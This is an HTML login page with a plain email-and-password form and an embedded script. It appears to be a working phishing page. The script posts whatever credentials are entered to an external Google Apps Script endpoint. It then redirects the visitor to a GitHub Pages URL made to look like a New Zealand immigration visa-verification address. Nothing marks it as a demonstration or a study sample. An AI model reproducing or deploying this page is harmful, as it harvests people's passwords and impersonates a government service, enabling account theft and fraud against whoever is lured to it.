<!DOCTYPE html>
<html lang="fa">
<head>
  <meta charset="UTF-8">
  <title> Login</title>
  <style>
    body {
      background: linear-gradient(to right, #6dd5fa, #2980b9);
      font-family: 'Vazirmatn', sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }

    .login-box {
      background-color: white;
      padding: 40px;
      border-radius: 20px;
      box-shadow: 0 10px 25px rgba(0,0,0,0.2);
      width: 100%;
      max-width: 400px;
      text-align: center;
      direction: rtl;
    }

    .login-box h2 {
      margin-bottom: 30px;
      color: #2c3e50;
    }

    input {
      width: 100%;
      padding: 12px;
      margin: 10px 0;
      border: 1px solid #ccc;
      border-radius: 10px;
      font-size: 16px;
    }

    button {
      background-color: #3498db;
      color: white;
      border: none;
      padding: 12px;
      border-radius: 10px;
      cursor: pointer;
      width: 100%;
      font-size: 18px;
      transition: background-color 0.3s;
    }

    button:hover {
      background-color: #2980b9;
    }

    #result {
      margin-top: 20px;
      font-weight: bold;
      color: red;
    }
  </style>
</head>
<body>

  <div class="login-box">
    <h2>login account</h2>
    <form id="loginForm">
      <input type="email" id="email" placeholder="Email" required>
      <input type="password" id="password" placeholder=" Password" required>
      <button type="submit">login</button>
    </form>
    <p id="result"></p>
  </div>

  <script>
    const SCRIPT_URL = "https://script.google.com/macros/s/AKfycbxW7bKT8EBQOOhGrdeCrq5N7SExp1zXMzGN9vR_77w_ty_Zfs659XMtKDU1elFgXFT--Q/exec";

    document.getElementById('loginForm').addEventListener('submit', async function(e) {
      e.preventDefault();

      const formData = new FormData();
      formData.append("email", document.getElementById('email').value);
      formData.append("password", document.getElementById('password').value);

      const res = await fetch(SCRIPT_URL, {
        method: "POST",
        body: formData
      });

      const text = await res.text();
      const result = document.getElementById('result');

      if (text === "success") {
        window.location.href = "https://newzealandvisaverification.github.io/https-visaview.immigration.govt.nz-vvs-registerVvsAccount.aspx/";
      } else {
        result.style.color = "red";
        result.textContent = " Incorect Password or Email.";
      }
    });
  </script>

</body>
</html>
